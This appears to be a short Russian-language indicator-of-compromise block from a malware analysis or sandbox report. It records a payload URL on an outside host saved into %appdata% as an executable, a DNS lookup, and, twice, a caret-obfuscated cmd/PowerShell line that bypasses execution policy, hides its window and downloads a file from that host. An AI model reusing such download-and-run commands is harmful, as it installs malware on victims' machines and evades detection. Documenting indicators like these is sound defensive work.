Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweRsHe^lL.eXE^ -eXEc^Ut^iONPOLiCY b^Y^P^aSS -NOp^ROf^iL^E ^-w^IN^dowStylE H^idDEN (n^eW^-^Ob^Je^ct sY^STe^m^.^net^.^w^E^BC^Li^ENt)^.^dow^n^L^o^ad^FILE^('http://footare...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "pOweRsHe^lL.eXE^ -eXEc^Ut^iONPOLiCY b^Y^P^aSS -NOp^ROf^iL^E ^-w^IN^dowStylE H^idDEN (n^eW^-^Ob^Je^ct sY^STe^m^.^net^.^w^E^BC^Li^ENt)^.^dow^n^L^o^ad^FILE^('http://footare...' (со скрытым окном)